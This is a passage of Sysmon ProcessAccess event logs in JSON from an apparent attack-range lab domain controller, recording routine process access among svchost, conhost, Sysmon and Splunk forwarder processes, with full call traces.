C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:59.027","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7517,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:59.027\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:59.027","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7518,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:59.027\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:59.027","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7519,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:59.027\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:59.027","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7520,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:59.027\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:59.027","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7521,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:59.027\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:59.027","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7522,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:59.027\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:59.027","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7523,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:59.027\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-0010F6780500}\r\nSourceProcessId: 3336\r\nSourceThreadId: 1980\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-132B-5F25-0000-0010AE7F0B00}\r\nTargetProcessId: 4968\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:59.027","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010F6780500}","SourceProcessId":"3336","SourceThreadId":"1980","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-132B-5F25-0000-0010AE7F0B00}","TargetProcessId":"4968","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7524,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:59.152\r\nSourceProcessGUID: {E2A3D6B1-132B-5F25-0000-0010AE7F0B00}\r\nSourceProcessId: 4968\r\nSourceThreadId: 4724\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nTargetProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nTargetProcessId: 1828\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:59.152","SourceProcessGUID":"{E2A3D6B1-132B-5F25-0000-0010AE7F0B00}","SourceProcessId":"4968","SourceThreadId":"4724","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","TargetProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","TargetProcessId":"1828","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program 